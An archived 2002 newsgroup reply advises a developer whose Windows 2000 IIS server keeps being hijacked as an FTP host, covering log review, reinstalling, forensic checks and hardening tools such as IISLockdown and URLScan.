Re: Open Ports....How to block them all....?

From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 11/19/02 

From: "Karl Levinson [x y] mvp" <levinson_k@excite.com>
Date: Tue, 19 Nov 2002 12:13:11 -0500

"Curt_C [MVP]" <Software_AT_Darkfalz.com> wrote in message
news:#IgLW29jCHA.1652@tkmsftngp11...
> Ok, here's the situation. Win2k Server running IIS, AD, Exch2000, SQL2000
>
> I keep it up to date with SP's and Patches but find that the server keeps
> getting hacked and used as an "FTP" server with that stupid "Serv-U" app.
> What can be done to secure this server so that this doesn't keep
happening?
> Is port blocking (leaving only bare necessity open) my only recourse? If
so,
> how?
>
> I'm a developer, and know only basic fundamentals of OS/IIS security.....
>
> Thanks
>
> (P.S... I keep manually killing the app that gets installed and manually
> deleting the files/app/dirs that the hack creates.)

This is pretty common. Frequently this happens through an IIS
vulnerability. If this is the case, check your IIS logs for anything
mentioning .EXE or % and that also has a code 200 or 502 in that line. This
may show you exactly what is happening. More information:
http://securityadmin.info/faq.htm#iislogs2
http://securityadmin.info/faq.htm#iislogs

Once your server has been hacked, you may want to consider formatting and
reinstalling Windows and everything else. You can choose not to do this,
however you are risking leaving other back doors on your system that might
allow future compromise. Installing Serv-U software typically involves a
person having the ability to remotely run commands and install files on your
system, which is pretty serious. They could have dumped your SAM file and
gotten all your local passwords, for example, using this method. Be sure to
do forensic investigation first to try to determine how this happened, so
that you can prevent it from happening next time and try to confirm that
other computers were not also compromised.

Tools to detect hacking include Vision which is free from
www.foundstone.com/knowledge,
a firewall such as www.sygate.com which is free, antivirus with the latest
updates such as the free www.grisoft.com, anti-trojan software such as
www.pestpatrol.com, a file change checker such as the free one from
www.gfi.com, Startup Cop downloaded from www.download.com or www.google.com,
etc.

More information on how to use these tools to detect hacking is detailed at:
http://securityadmin.info/faq.htm#hacked

Ways to secure your system are detailed at:
http://securityadmin.info/faq.htm#re-secure
http://securityadmin.info/faq.htm#harden <-- most important
http://securityadmin.info/faq.htm#firewall
http://securityadmin.info/faq.htm#virus

Specifically, I would try running the MBSA which is free from
www.microsoft.com/download, be sure you have installed IISLockdown including
URLScan which I am guessing probably would have prevented this attack, and
follow one or more hardening checklists on how to secure both IIS and
Windows. It also sounds like you could use antivirus like www.grisoft.com
[free], anti trojan software like www.pestpatrol.com, and one or more
software or hardware firewall solutions, such as www.sygate.com [which is
free for non-commercial use].

Remember that security is not just patches but also proper configuration and
third party hardening tools. A system with all the patches can still be
easily hacked if you didn't also make changes to the IIS configuration,
disable unnecessary services, etc. This is all stuff I would do LAST, after
discovering the vulnerability and intrusion method and securing the system
in whatever way you choose.

Relevant Pages

  • Re: IIS Hack : Anyone explain cause...
    ... it looks like you cleaned up the server -- if you care about security, ... Microsoft tries and mostly succeeds to release patches PRIOR to ... weeks/months/years prior to exploitation. ... > protected rant as we all know that IIS and indeed lots of software has ...
    (microsoft.public.inetserver.iis)
  • Re: Security of IIS - Secure Intranet web site on SBS2003 box
    ... I guess a lot of those patches would be required anyway to ensure the HTTPS ... Because if IIS via HTTPS only is still not considered secure then surely the ... > to rebuild their server and return everything to normal. ...
    (microsoft.public.windows.server.sbs)
  • Re: Open Ports....How to block them all....?
    ... >> What can be done to secure this server so that this doesn't keep> happening? ... Frequently this happens through an IIS> vulnerability. ... Installing Serv-U software typically involves a> person having the ability to remotely run commands and install files on your> system, ... > Remember that security is not just patches but also proper configuration and> third party hardening tools. ...
    (microsoft.public.inetserver.iis.security)
  • Re: Outlook Web Access!!
    ... I don't know how they can be so sure it's secure... ... relevant IIS and other patches as they come out. ... OWA to your DC to do user authentication, ... > protect Exchange server in four different ways. ...
    (microsoft.public.security)
  • Re: Outlook Web Access!!
    ... I don't know how they can be so sure it's secure... ... relevant IIS and other patches as they come out. ... OWA to your DC to do user authentication, ... > protect Exchange server in four different ways. ...
    (microsoft.public.win2000.security)